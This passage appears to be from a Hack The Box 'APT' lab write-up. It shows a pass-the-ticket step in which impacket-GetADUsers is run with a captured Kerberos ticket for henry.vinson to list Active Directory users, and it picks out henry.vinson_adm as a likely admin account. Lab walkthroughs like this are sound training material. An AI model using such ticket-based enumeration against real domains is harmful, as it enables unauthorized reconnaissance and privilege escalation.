Username Extraction
Extracting domain users through thepass_the_ticket technique with the TGT of the henry.vinson user
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-GetADUsers htb.local/henry.vinson@apt.htb.local -no-pass -k -dc-ip $IPv6 -all
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting machine hostname
[*] Querying APT for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
administrator 2020-09-24 09:16:56.877100 2023-10-22 14:26:23.366700
Guest <never> <never>
DefaultAccount <never> <never>
krbtgt 2020-09-24 09:16:10.955170 <never>
henry.vinson 2020-09-24 09:23:05.049694 2023-10-22 21:33:20.842154
henry.vinson_adm 2020-09-24 09:23:05.190322 2020-10-23 12:01:51.244555 Contrast to those 2000 domain users found earlier, there are only 2 none default domain users; henry.vinson and henry.vinson_adm
Judging by the name, the henry.vinson_adm user is likely an administrative account with a high privilege